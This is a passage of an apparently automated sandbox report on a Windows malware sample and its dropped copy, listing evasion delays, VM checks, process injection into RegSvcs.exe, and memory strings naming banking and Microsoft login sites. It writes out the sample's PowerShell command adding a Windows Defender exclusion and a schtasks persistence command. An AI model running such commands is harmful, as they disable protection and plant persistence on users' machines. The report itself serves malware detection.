                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: 5000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: 8300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: A960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: B960000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 45A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 89B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 7350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: 99B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: A9B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7288Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2268Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3808Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4486Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2586
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5247
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe TID: 1736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exe TID: 4584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: tmp5CE1.tmp.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: tmp5CE1.tmp.7.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: tmp5CE1.tmp.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: tmp5CE1.tmp.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: tmp5CE1.tmp.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: tmp5CE1.tmp.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: tmp5CE1.tmp.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: RegSvcs.exe, 00000007.00000002.1595769965.00000000011D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: RegSvcs.exe, 0000000D.00000002.1625678293.0000000001029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmp5CE1.tmp.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: tmp5CE1.tmp.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: tmp5CE1.tmp.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1458811526.00000000011C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: tmp5CE1.tmp.7.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: tmp5CE1.tmp.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: tmp5CE1.tmp.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: tmp5CE1.tmp.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EA3008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B38008Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Users\user\Desktop\13P2mxLaQk.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeQueries volume information: C:\Users\user\AppData\Roaming\VWGccZGgix.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
